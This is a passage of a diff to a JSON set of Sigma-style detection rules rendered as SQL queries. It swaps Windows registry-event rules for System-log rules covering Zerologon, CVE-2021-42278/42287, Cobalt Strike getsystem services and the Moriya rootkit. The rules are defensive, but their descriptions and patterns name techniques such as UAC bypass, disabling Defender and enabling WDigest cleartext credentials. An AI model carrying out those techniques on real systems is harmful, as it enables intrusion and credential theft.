- "attack.persistence", - "attack.t1547.004" + "attack.defense_evasion", + "attack.t1574.002" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND TargetObject LIKE 
'%\\\\SOFTWARE\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Winlogon\\\\Notify\\\\logon' ESCAPE '\\' AND Details LIKE '%.dll' ESCAPE '\\' AND EventType = 'SetValue')" + "SELECT * FROM logs WHERE (Channel = 'System' AND EventID = '1033' AND Provider_Name = 'Microsoft-Windows-DHCP-Server')" ], - "filename": "registry_set_winlogon_notify_key.yml" + "filename": "win_system_susp_dhcp_config.yml" }, { - "title": "Office Security Settings Changed", - "id": "a166f74e-bf44-409d-b9ba-ea4b2dd8b3cd", - "status": "experimental", - "description": "Detects registry changes to Office macro settings. The TrustRecords contain information on executed macro-enabled documents. (see references)", - "author": "Trent Liffick (@tliffick)", + "title": "DHCP Server Error Failed Loading the CallOut DLL", + "id": "75edd3fd-7146-48e5-9848-3013d7f0282c", + "status": "test", + "description": "This rule detects a DHCP server error in which a specified Callout DLL (in registry) could not be loaded", + "author": "Dimitrios Slamaris, @atc_project (fix)", "tags": [ "attack.defense_evasion", - "attack.t1112" + "attack.t1574.002" ], "falsepositives": [ - "Valid Macros and/or internal documents" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND EventType = 'Setvalue' AND (TargetObject LIKE '%\\\\Security\\\\Trusted Documents\\\\TrustRecords' ESCAPE '\\' OR TargetObject LIKE '%\\\\Security\\\\AccessVBOM' ESCAPE '\\' OR TargetObject LIKE '%\\\\Security\\\\VBAWarnings' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (Channel = 'System' AND EventID IN ('1031', '1032', '1034') AND Provider_Name = 'Microsoft-Windows-DHCP-Server')" ], - "filename": "registry_set_office_security.yml" + "filename": "win_system_susp_dhcp_config_failed.yml" }, { - "title": "Bypass UAC Using SilentCleanup Task", - "id": "724ea201-6514-4f38-9739-e5973c34f49a", + "title": "QuarksPwDump Clearing Access History", + "id": 
"39f919f3-980b-4e6f-a975-8af7e507ef2b", "status": "test", - "description": "There is an auto-elevated task called SilentCleanup located in %windir%\\system32\\cleanmgr.exe This can be abused to elevate any file with Administrator privileges without prompting UAC", - "author": "frack113", + "description": "Detects QuarksPwDump clearing access history in hive", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.privilege_escalation", - "attack.defense_evasion", - "attack.t1548.002" + "attack.credential_access", + "attack.t1003.002" ], "falsepositives": [ "Unknown" ], - "level": "high", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE (EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND TargetObject LIKE '%\\\\Environment\\\\windir' ESCAPE '\\' AND Details LIKE '%&REM%' ESCAPE '\\' AND EventType = 'SetValue')" + "SELECT * FROM logs WHERE (Channel = 'System' AND EventID = '16' AND Provider_Name = 'Microsoft-Windows-Kernel-General' AND HiveName LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\SAM%' ESCAPE '\\' AND HiveName LIKE '%.dmp' ESCAPE '\\')" ], - "filename": "registry_set_bypass_uac_using_silentcleanup_task.yml" + "filename": "win_system_quarkspwdump_clearing_hive_access_history.yml" }, { - "title": "Disable Tamper Protection on Windows Defender", - "id": "93d298a1-d28f-47f1-a468-d971e7796679", + "title": "NTLMv1 Logon Between Client and Server", + "id": "e9d4ab66-a532-4ef7-a502-66a9e4a34f5d", "status": "experimental", - "description": "Detects disabling Windows Defender Tamper Protection", - "author": "Austin Songer @austinsonger", + "description": "Detects the reporting of NTLMv1 being used between a client and server", + "author": "Tim Shelton", "tags": [ - "attack.defense_evasion", - "attack.t1562.001" + "attack.execution", + "attack.t1550.002", + "attack.s0363" ], "falsepositives": [ - "Unknown" + "Environments that use NTLMv1" ], - "level": "medium", + "level": "low", "rule": [ - "SELECT * FROM logs WHERE ((EventID = 
'13' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (EventType = 'SetValue' AND TargetObject LIKE '%\\\\Microsoft\\\\Windows Defender\\\\Features\\\\TamperProtection%' ESCAPE '\\' AND Details = 'DWORD (0x00000000)') AND NOT ((Image LIKE 'C:\\\\ProgramData\\\\Microsoft\\\\Windows Defender\\\\Platform\\\\%' ESCAPE '\\' AND Image LIKE '%\\\\MsMpEng.exe' ESCAPE '\\') OR (Image LIKE 'C:\\\\Program Files\\\\Windows Defender\\\\MsMpEng.exe' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (Channel = 'System' AND Provider_Name = 'LsaSrv' AND EventID = '6038')" ], - "filename": "registry_set_disabled_tamper_protection_on_microsoft_defender.yml" + "filename": "win_system_lsasrv_ntlmv1.yml" }, { - "title": "Disabled Windows Defender Eventlog", - "id": "fcddca7c-b9c0-4ddf-98da-e1e2d18b0157", - "status": "experimental", - "description": "Detects the disabling of the Windows Defender eventlog as seen in relation to Lockbit 3.0 infections", - "author": "Florian Roth (Nextron Systems)", + "title": "Potential CVE-2021-42278 Exploitation Attempt", + "id": "44bbff3e-4ca3-452d-a49a-6efa4cafa06f", + "status": "test", + "description": "The attacker creates a computer object using those permissions with a password known to her.\nAfter that she clears the attribute ServicePrincipalName on the computer object.\nBecause she created the object (CREATOR OWNER), she gets granted additional permissions and can do many changes to the object.\n", + "author": "frack113", "tags": [ - "attack.defense_evasion", - "attack.t1562.001" + "attack.credential_access", + "attack.t1558.003" ], "falsepositives": [ - "Other Antivirus software installations could cause Windows to disable that eventlog (unknown)" + "Unknown" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND EventType = 'SetValue' AND TargetObject LIKE 
'%\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\WINEVT\\\\Channels\\\\Microsoft-Windows-Windows Defender/Operational\\\\Enabled%' ESCAPE '\\' AND Details = 'DWORD (0x00000000)')" + "SELECT * FROM logs WHERE (Channel = 'System' AND Provider_Name = 'Microsoft-Windows-Kerberos-Key-Distribution-Center' AND EventID IN ('35', '36', '37', '38'))" ], - "filename": "registry_set_disabled_microsoft_defender_eventlog.yml" + "filename": "win_system_exploit_cve_2021_42278.yml" }, { - "title": "Disable Internal Tools or Feature in Registry", - "id": "e2482f8d-3443-4237-b906-cc145d87a076", - "status": "experimental", - "description": "Detects registry modifications that change features of internal Windows tools (malware like Agent Tesla uses this technique)", - "author": "frack113, Nasreddine Bencherchali", + "title": "Potential CVE-2021-42287 Exploitation Attempt", + "id": "e80a0fee-1a62-4419-b31e-0d0db6e6013a", + "status": "test", + "description": "The attacker creates a computer object using those permissions with a password known to her.\nAfter that she clears the attribute ServicePrincipalName on the computer object.\nBecause she created the object (CREATOR OWNER), she gets granted additional permissions and can do many changes to the object.\n", + "author": "frack113", "tags": [ - "attack.defense_evasion", - "attack.t1112" + "attack.credential_access", + "attack.t1558.003" ], "falsepositives": [ - "Legitimate admin script" + "Unknown" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((EventType = 'SetValue' AND (TargetObject LIKE '%SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Policies\\\\System\\\\DisableRegistryTools' ESCAPE '\\' OR TargetObject LIKE '%SOFTWARE\\\\Policies\\\\Microsoft\\\\Windows\\\\System\\\\DisableCMD' ESCAPE '\\' OR TargetObject LIKE '%SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Policies\\\\System\\\\DisableTaskmgr' ESCAPE '\\' OR TargetObject LIKE 
'%SOFTWARE\\\\Policies\\\\Microsoft\\\\Windows\\\\Explorer\\\\DisableNotificationCenter' ESCAPE '\\' OR TargetObject LIKE '%SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Policies\\\\System\\\\DisableChangePassword' ESCAPE '\\' OR TargetObject LIKE '%SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Policies\\\\System\\\\DisableLockWorkstation' ESCAPE '\\' OR TargetObject LIKE '%SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Policies\\\\Explorer\\\\StartMenuLogOff' ESCAPE '\\') AND Details = 'DWORD (0x00000001)') OR (EventType = 'SetValue' AND (TargetObject LIKE '%SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Policies\\\\System\\\\shutdownwithoutlogon' ESCAPE '\\' OR TargetObject LIKE '%SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Policies\\\\System\\\\ConsentPromptBehaviorAdmin' ESCAPE '\\' OR TargetObject LIKE '%SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\PushNotifications\\\\ToastEnabled' ESCAPE '\\' OR TargetObject LIKE '%\\\\SYSTEM\\\\CurrentControlSet\\\\Control\\\\Storage\\\\Write Protection' ESCAPE '\\' OR TargetObject LIKE '%\\\\SYSTEM\\\\CurrentControlSet\\\\Control\\\\StorageDevicePolicies\\\\WriteProtect' ESCAPE '\\') AND Details = 'DWORD (0x00000000)')))" + "SELECT * FROM logs WHERE (Channel = 'System' AND Provider_Name = 'Microsoft-Windows-Directory-Services-SAM' AND EventID IN ('16990', '16991'))" + ], + "filename": "win_system_exploit_cve_2021_42287.yml" + }, + { + "title": "Zerologon Exploitation Using Well-known Tools", + "id": "18f37338-b9bd-4117-a039-280c81f7a596", + "status": "stable", + "description": "This rule is designed to detect attempts to exploit Zerologon (CVE-2020-1472) vulnerability using mimikatz zerologon module or other exploits from machine with \"kali\" hostname.", + "author": "Demyan Sokolin @_drd0c, Teymur Kheirkhabarov @HeirhabarovT, oscd.community", + "tags": [ + "attack.t1210", + "attack.lateral_movement" + ], + "level": "critical", + "rule": [ + "SELECT * FROM logs WHERE 
(Channel = 'System' AND EventID IN ('5805', '5723') AND (logs MATCH ('\"kali\" OR \"mimikatz\"')))" ], - "filename": "registry_set_disable_function_user.yml" + "filename": "win_system_possible_zerologon_exploitation_using_wellknown_tools.yml" }, { - "title": "DHCP Callout DLL Installation", - "id": "9d3436ef-9476-4c43-acca-90ce06bdf33a", + "title": "Vulnerable Netlogon Secure Channel Connection Allowed", + "id": "a0cb7110-edf0-47a4-9177-541a4083128a", "status": "test", - "description": "Detects the installation of a Callout DLL via CalloutDlls and CalloutEnabled parameter in Registry, which can be used to execute code in context of the DHCP server (restart required)", - "author": "Dimitrios Slamaris", + "description": "Detects that a vulnerable Netlogon secure channel connection was allowed, which could be an indicator of CVE-2020-1472.", + "author": "NVISO", "tags": [ - "attack.defense_evasion", - "attack.t1574.002", - "attack.t1112" + "attack.privilege_escalation", + "attack.t1548" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND EventType = 'Setvalue' AND (TargetObject LIKE '%\\\\Services\\\\DHCPServer\\\\Parameters\\\\CalloutDlls' ESCAPE '\\' OR TargetObject LIKE '%\\\\Services\\\\DHCPServer\\\\Parameters\\\\CalloutEnabled' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (Channel = 'System' AND Provider_Name = 'NetLogon' AND EventID = '5829')" ], - "filename": "registry_set_dhcp_calloutdll.yml" + "filename": "win_system_vul_cve_2020_1472.yml" }, { - "title": "CobaltStrike Service Installations in Registry", - "id": "61a7697c-cb79-42a8-a2ff-5f0cdfae0130", - "status": "test", - "description": "Detects known malicious service installs that appear in cases in which a Cobalt Strike beacon elevates privileges or lateral movement.\nWe can also catch this by system log 7045 
(https://github.com/SigmaHQ/sigma/blob/master/rules/windows/builtin/win_cobaltstrike_service_installs.yml)\nIn some SIEM you can catch those events also in HKLM\\System\\ControlSet001\\Services or HKLM\\System\\ControlSet002\\Services, however, this rule is based on a regular sysmon's events.\n", - "author": "Wojciech Lesicki", + "title": "KDC RC4-HMAC Downgrade CVE-2022-37966", + "id": "e6f81941-b1cd-4766-87db-9fc156f658ee", + "status": "experimental", + "description": "Detects the exploitation of a security bypass and elevation of privilege vulnerability with Authentication Negotiation by using weak RC4-HMAC negotiation", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.execution", - "attack.privilege_escalation", - "attack.lateral_movement", - "attack.t1021.002", - "attack.t1543.003", - "attack.t1569.002" + "attack.privilege_escalation" ], "falsepositives": [ "Unknown" ], - "level": "critical", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (EventType = 'SetValue' AND TargetObject LIKE '%HKLM\\\\System\\\\CurrentControlSet\\\\Services%' ESCAPE '\\') AND ((Details LIKE '%ADMIN$%' ESCAPE '\\' AND Details LIKE '%.exe%' ESCAPE '\\') OR (Details LIKE '%\\%COMSPEC\\%%' ESCAPE '\\' AND Details LIKE '%start%' ESCAPE '\\' AND Details LIKE '%powershell%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (Channel = 'System' AND EventID = '42' AND Provider_Name = 'Kerberos-Key-Distribution-Center' AND Level = '2')" ], - "filename": "registry_set_cobaltstrike_service_installs.yml" + "filename": "win_system_kdcsvc_rc4_downgrade.yml" }, { - "title": "Wdigest Enable UseLogonCredential", - "id": "d6a9b252-c666-4de6-8806-5561bbbd3bdc", + "title": "Volume Shadow Copy Mount", + "id": "f512acbf-e662-4903-843e-97ce4652b740", "status": "test", - "description": "Detects potential malicious modification of the property value of UseLogonCredential from 
HKLM:\\SYSTEM\\CurrentControlSet\\Control\\SecurityProviders\\WDigest to enable clear-text credentials", - "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)", + "description": "Detects volume shadow copy mount via windows event log", + "author": "Roberto Rodriguez @Cyb3rWard0g, Open Threat Research (OTR)", "tags": [ - "attack.defense_evasion", - "attack.t1112" + "attack.credential_access", + "attack.t1003.002" ], "falsepositives": [ - "Unknown" + "Legitimate use of volume shadow copy mounts (backups maybe)." ], - "level": "high", + "level": "low", "rule": [ - "SELECT * FROM logs WHERE (EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND EventType = 'SetValue' AND TargetObject LIKE '%WDigest\\\\UseLogonCredential' ESCAPE '\\' AND Details = 'DWORD (0x00000001)')" + "SELECT * FROM logs WHERE (Channel = 'System' AND Provider_Name = 'Microsoft-Windows-Ntfs' AND EventID = '98' AND DeviceName LIKE '%HarddiskVolumeShadowCopy%' ESCAPE '\\')" ], - "filename": "registry_set_wdigest_enable_uselogoncredential.yml" + "filename": "win_system_volume_shadow_copy_mount.yml" }, { - "title": "VBScript Payload Stored in Registry", - "id": "46490193-1b22-4c29-bdd6-5bf63907216f", - "status": "experimental", - "description": "Detects VBScript content stored into registry keys as seen being used by UNC2452 group", + "title": "NTFS Vulnerability Exploitation", + "id": "f14719ce-d3ab-4e25-9ce6-2899092260b0", + "status": "test", + "description": "This the exploitation of a NTFS vulnerability as reported without many details via Twitter", "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.persistence", - "attack.t1547.001" + "attack.impact", + "attack.t1499.001" ], "falsepositives": [ - "Unknown" + "Unlikely" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (EventType = 'SetValue' AND TargetObject LIKE '%Software\\\\Microsoft\\\\Windows\\\\CurrentVersion%' 
ESCAPE '\\' AND (Details LIKE '%vbscript:%' ESCAPE '\\' OR Details LIKE '%jscript:%' ESCAPE '\\' OR Details LIKE '%mshtml,%' ESCAPE '\\' OR Details LIKE '%RunHTMLApplication%' ESCAPE '\\' OR Details LIKE '%Execute(%' ESCAPE '\\' OR Details LIKE '%CreateObject%' ESCAPE '\\' OR Details LIKE '%window.close%' ESCAPE '\\')) AND NOT ((TargetObject LIKE '%Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run%' ESCAPE '\\') OR (Image LIKE '%\\\\msiexec.exe' ESCAPE '\\' AND TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Installer\\\\UserData\\\\%' ESCAPE '\\' AND (Details LIKE '%\\\\Microsoft.NET\\\\Primary Interop Assemblies\\\\Microsoft.mshtml.dll%' ESCAPE '\\' OR Details LIKE '%<\\\\Microsoft.mshtml,fileVersion=%' ESCAPE '\\' OR Details LIKE '%\\_mshtml\\_dll\\_%' ESCAPE '\\' OR Details LIKE '%<\\\\Microsoft.mshtml,culture=%' ESCAPE '\\'))))" + "SELECT * FROM logs WHERE (Channel = 'System' AND Provider_Name = 'Ntfs' AND EventID = '55' AND Origin = 'File System Driver' AND Description LIKE '%contains a corrupted file record%' ESCAPE '\\' AND Description LIKE '%The name of the file is \"\\\\\"%' ESCAPE '\\')" ], - "filename": "registry_set_vbs_payload_stored.yml" + "filename": "win_system_ntfs_vuln_exploit.yml" }, { - "title": "Disable Microsoft Office Security Features", - "id": "7c637634-c95d-4bbf-b26c-a82510874b34", + "title": "Windows Update Error", + "id": "13cfeb75-9e33-4d04-b0f7-ab8faaa95a59", "status": "test", - "description": "Disable Microsoft Office Security Features by registry", + "description": "Windows Update get some error Check if need a 0-days KB", "author": "frack113", "tags": [ - "attack.defense_evasion", - "attack.t1562.001" + "attack.impact", + "attack.resource_development", + "attack.t1584" ], "falsepositives": [ "Unknown" ], - "level": "high", + "level": "low", "rule": [ - "SELECT * FROM logs WHERE (EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND EventType = 'SetValue' AND TargetObject LIKE 
'%\\\\SOFTWARE\\\\Microsoft\\\\Office\\\\%' ESCAPE '\\' AND (TargetObject LIKE '%VBAWarnings' ESCAPE '\\' OR TargetObject LIKE '%DisableInternetFilesInPV' ESCAPE '\\' OR TargetObject LIKE '%DisableUnsafeLocationsInPV' ESCAPE '\\' OR TargetObject LIKE '%DisableAttachementsInPV' ESCAPE '\\') AND Details = 'DWORD (0x00000001)')" + "SELECT * FROM logs WHERE (Channel = 'System' AND Provider_Name = 'Microsoft-Windows-WindowsUpdateClient' AND EventID IN ('16', '20', '24', '213', '217'))" ], - "filename": "registry_set_disable_microsoft_office_security_features.yml" + "filename": "win_system_susp_system_update_error.yml" }, { - "title": "Modification of IE Registry Settings", - "id": "d88d0ab2-e696-4d40-a2ed-9790064e66b3", + "title": "Local Privilege Escalation Indicator TabTip", + "id": "bc2e25ed-b92b-4daa-b074-b502bdd1982b", "status": "experimental", - "description": "Detects modification of the registry settings used for Internet Explorer and other Windows components that use these settings. 
An attacker can abuse this registry key to add a domain to the trusted sites Zone or insert javascript for persistence", - "author": "frack113", + "description": "Detects the invocation of TabTip via CLSID as seen when JuicyPotatoNG is used on a system in brute force mode", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1112" + "attack.execution", + "attack.t1557.001" ], "falsepositives": [ "Unknown" ], - "level": "low", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (EventType = 'SetValue' AND TargetObject LIKE '%\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Internet Settings%' ESCAPE '\\') AND NOT ((Details LIKE 'DWORD%' ESCAPE '\\') OR (Details IN ('Cookie:', 'Visited:', '(Empty)')) OR ((TargetObject LIKE '%\\\\Cache%' ESCAPE '\\' OR TargetObject LIKE '%\\\\ZoneMap%' ESCAPE '\\' OR TargetObject LIKE '%\\\\WpadDecision%' ESCAPE '\\')) OR (Details = 'Binary Data') OR (TargetObject LIKE '%\\\\Accepted Documents\\\\%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (Channel = 'System' AND Provider_Name = 'Microsoft-Windows-DistributedCOM' AND EventID = '10001' AND param1 LIKE 'C:\\\\Program Files\\\\Common Files\\\\microsoft shared\\\\ink\\\\TabTip.exe' ESCAPE '\\' AND param2 = '2147943140' AND param3 = '{054AAE20-4BEA-4347-8A35-64A533254A9D}')" ], - "filename": "registry_set_persistence_ie.yml" + "filename": "win_system_lpe_indicators_tabtip.yml" }, { - "title": "Disable Security Events Logging Adding Reg Key MiniNt", - "id": "919f2ef0-be2d-4a7a-b635-eb2b41fde044", - "status": "test", - "description": "Detects the addition of a key 'MiniNt' to the registry. 
Upon a reboot, Windows Event Log service will stopped write events.", - "author": "Ilyas Ochkov, oscd.community", + "title": "Service Installed By Unusual Client - System", + "id": "71c276aa-49cd-43d2-b920-2dcd3e6962d5", + "status": "experimental", + "description": "Detects a service installed by a client which has PID 0 or whose parent has PID 0", + "author": "Tim Rauch", "tags": [ - "attack.defense_evasion", - "attack.t1562.001", - "attack.t1112" + "attack.privilege_escalation", + "attack.t1543" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID IN ('12', '13', '14') AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((TargetObject LIKE 'HKLM\\\\SYSTEM\\\\CurrentControlSet\\\\Control\\\\MiniNt' ESCAPE '\\' AND EventType = 'CreateKey') OR NewName LIKE 'HKLM\\\\SYSTEM\\\\CurrentControlSet\\\\Control\\\\MiniNt' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (Channel = 'System' AND Provider_Name = 'Service Control Manager' AND EventID = '7045' AND ProcessId = '0')" ], - "filename": "registry_event_disable_security_events_logging_adding_reg_key_minint.yml" + "filename": "win_system_system_service_installation_by_unusal_client.yml" }, { - "title": "PrinterNightmare Mimimkatz Driver Name", - "id": "ba6b9e43-1d45-4d3c-a504-1043a64c8469", - "status": "test", - "description": "Detects static QMS 810 and mimikatz driver name used by Mimikatz as exploited in CVE-2021-1675 and CVE-2021-34527", - "author": "Markus Neis, @markus_neis, Florian Roth", + "title": "Moriya Rootkit - System", + "id": "25b9c01c-350d-4b95-bed1-836d04a4f324", + "status": "experimental", + "description": "Detects the use of Moriya rootkit as described in the securelist's Operation TunnelSnake report", + "author": "Bhabesh Raj", "tags": [ - "attack.execution", - "attack.t1204", - "cve.2021.1675", - "cve.2021.34527" + "attack.persistence", + "attack.privilege_escalation", + "attack.t1543.003" ], "falsepositives": [ - "Legitimate installation of printer 
driver QMS 810, Texas Instruments microLaser printer (unlikely)" + "Unknown" ], "level": "critical", "rule": [ - "SELECT * FROM logs WHERE ((EventID IN ('12', '13', '14') AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (((TargetObject LIKE '%\\\\Control\\\\Print\\\\Environments\\\\Windows x64\\\\Drivers\\\\Version-3\\\\QMS 810\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Control\\\\Print\\\\Environments\\\\Windows x64\\\\Drivers\\\\Version-3\\\\mimikatz%' ESCAPE '\\') OR (TargetObject LIKE '%legitprinter%' ESCAPE '\\' AND TargetObject LIKE '%\\\\Control\\\\Print\\\\Environments\\\\Windows%' ESCAPE '\\')) OR ((TargetObject LIKE '%\\\\Control\\\\Print\\\\Environments%' ESCAPE '\\' OR TargetObject LIKE '%\\\\CurrentVersion\\\\Print\\\\Printers%' ESCAPE '\\') AND (TargetObject LIKE '%Gentil Kiwi%' ESCAPE '\\' OR TargetObject LIKE '%mimikatz printer%' ESCAPE '\\' OR TargetObject LIKE '%Kiwi Legit Printer%' ESCAPE '\\'))))" + "SELECT * FROM logs WHERE (Channel = 'System' AND Provider_Name = 'Service Control Manager' AND EventID = '7045' AND ServiceName = 'ZzNetSvc')" ], - "filename": "registry_event_mimikatz_printernightmare.yml" + "filename": "win_system_moriya_rootkit.yml" }, { - "title": "DLL Load via LSASS", - "id": "b3503044-60ce-4bf4-bbcb-e3db98788823", - "status": "test", - "description": "Detects a method to load DLL via LSASS process using an undocumented Registry key", - "author": "Florian Roth (Nextron Systems)", + "title": "Service Installation in Suspicious Folder", + "id": "5e993621-67d4-488a-b9ae-b420d08b96cb", + "status": "experimental", + "description": "Detects service installation in suspicious folder appdata", + "author": "pH-T (Nextron Systems)", "tags": [ - "attack.execution", "attack.persistence", - "attack.t1547.008" + "attack.privilege_escalation", + "car.2013-09-005", + "attack.t1543.003" ], "falsepositives": [ "Unknown" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID IN ('12', '13', '14') AND 
Channel = 'Microsoft-Windows-Sysmon/Operational') AND (TargetObject LIKE '%\\\\CurrentControlSet\\\\Services\\\\NTDS\\\\DirectoryServiceExtPt%' ESCAPE '\\' OR TargetObject LIKE '%\\\\CurrentControlSet\\\\Services\\\\NTDS\\\\LsaDbExtPt%' ESCAPE '\\') AND NOT ((Image LIKE 'C:\\\\Windows\\\\system32\\\\lsass.exe' ESCAPE '\\' AND (Details LIKE '\\%\\%systemroot\\%\\%\\\\system32\\\\ntdsa.dll' ESCAPE '\\' OR Details LIKE '\\%\\%systemroot\\%\\%\\\\system32\\\\lsadb.dll' ESCAPE '\\'))))" + "SELECT * FROM logs WHERE (Channel = 'System' AND (Provider_Name = 'Service Control Manager' AND EventID = '7045' AND (ImagePath LIKE '%\\\\AppData\\\\%' ESCAPE '\\' OR ImagePath LIKE '%\\\\\\\\127.0.0.1%' ESCAPE '\\' OR ImagePath LIKE '%\\\\\\\\localhost%' ESCAPE '\\')) AND NOT ((ServiceName = 'Zoom Sharing Service' AND ImagePath LIKE '\"C:\\\\Program Files\\\\Common Files\\\\Zoom\\\\Support\\\\CptService.exe%' ESCAPE '\\')))" ], - "filename": "registry_event_susp_lsass_dll_load.yml" + "filename": "win_system_susp_service_installation_folder.yml" }, { - "title": "Run Once Task Configuration in Registry", - "id": "c74d7efc-8826-45d9-b8bb-f04fac9e4eff", - "status": "test", - "description": "Rule to detect the configuration of Run Once registry key. 
Configured payload can be run by runonce.exe /AlternateShellStartup", - "author": "Avneet Singh @v3t0_, oscd.community", + "title": "Meterpreter or Cobalt Strike Getsystem Service Installation - System", + "id": "843544a7-56e0-4dcc-a44f-5cc266dd97d6", + "status": "experimental", + "description": "Detects the use of getsystem Meterpreter/Cobalt Strike command by detecting a specific service installation", + "author": "Teymur Kheirkhabarov, Ecco, Florian Roth", "tags": [ - "attack.defense_evasion", - "attack.t1112" + "attack.privilege_escalation", + "attack.t1134.001", + "attack.t1134.002" ], "falsepositives": [ - "Legitimate modification of the registry key by legitimate program" + "Highly unlikely" ], - "level": "medium", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE ((EventID IN ('12', '13', '14') AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (TargetObject LIKE 'HKLM\\\\SOFTWARE\\\\Microsoft\\\\Active Setup\\\\Installed Components%' ESCAPE '\\' AND TargetObject LIKE '%\\\\StubPath' ESCAPE '\\') AND NOT ((Details LIKE '\"C:\\\\Program Files\\\\Google\\\\Chrome\\\\Application\\\\%' ESCAPE '\\' AND Details LIKE '%\\\\Installer\\\\chrmstp.exe\" --configure-user-settings --verbose-logging --system-level%' ESCAPE '\\') OR ((Details LIKE '\"C:\\\\Program Files (x86)\\\\Microsoft\\\\Edge\\\\Application\\\\%' ESCAPE '\\' OR Details LIKE '\"C:\\\\Program Files\\\\Microsoft\\\\Edge\\\\Application\\\\%' ESCAPE '\\') AND Details LIKE '%\\\\Installer\\\\setup.exe\" --configure-user-settings --verbose-logging --system-level --msedge --channel=stable' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (Channel = 'System' AND (Provider_Name = 'Service Control Manager' AND EventID = '7045') AND ((ImagePath LIKE '%cmd%' ESCAPE '\\' AND ImagePath LIKE '%/c%' ESCAPE '\\' AND ImagePath LIKE '%echo%' ESCAPE '\\' AND ImagePath LIKE '%\\\\pipe\\\\%' ESCAPE '\\') OR (ImagePath LIKE '%\\%COMSPEC\\%%' ESCAPE '\\' AND ImagePath LIKE '%/c%' ESCAPE '\\' AND ImagePath LIKE 
'%echo%' ESCAPE '\\' AND ImagePath LIKE '%\\\\pipe\\\\%' ESCAPE '\\') OR (ImagePath LIKE '%cmd.exe%' ESCAPE '\\' AND ImagePath LIKE '%/c%' ESCAPE '\\' AND ImagePath LIKE '%echo%' ESCAPE '\\' AND ImagePath LIKE '%\\\\pipe\\\\%' ESCAPE '\\') OR (ImagePath LIKE '%rundll32%' ESCAPE '\\' AND ImagePath LIKE '%.dll,a%' ESCAPE '\\' AND ImagePath LIKE '%/p:%' ESCAPE '\\') OR ImagePath LIKE '\\\\\\\\127.0.0.1\\\\ADMIN$\\\\%' ESCAPE '\\'))" ], - "filename": "registry_event_runonce_persistence.yml" + "filename": "win_system_meterpreter_or_cobaltstrike_getsystem_service_installation.yml" }, { - "title": "Shell Open Registry Keys Manipulation", - "id": "152f3630-77c1-4284-bcc0-4cc68ab2f6e7", - "status": "test", - "description": "Detects the shell open key manipulation (exefile and ms-settings) used for persistence and the pattern of UAC Bypass using fodhelper.exe, computerdefaults.exe, slui.exe via registry keys (e.g. UACMe 33 or 62)", - "author": "Christian Burkard (Nextron Systems)", + "title": "Invoke-Obfuscation STDIN+ Launcher - System", + "id": "72862bf2-0eb1-11eb-adc1-0242ac120002", + "status": "experimental", + "description": "Detects Obfuscated use of stdin to execute PowerShell", + "author": "Jonathan Cheong, oscd.community", "tags": [ "attack.defense_evasion", - "attack.privilege_escalation", - "attack.t1548.002", - "attack.t1546.001" + "attack.t1027", + "attack.execution", + "attack.t1059.001" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID IN ('12', '13', '14') AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (((EventType = 'SetValue' AND TargetObject 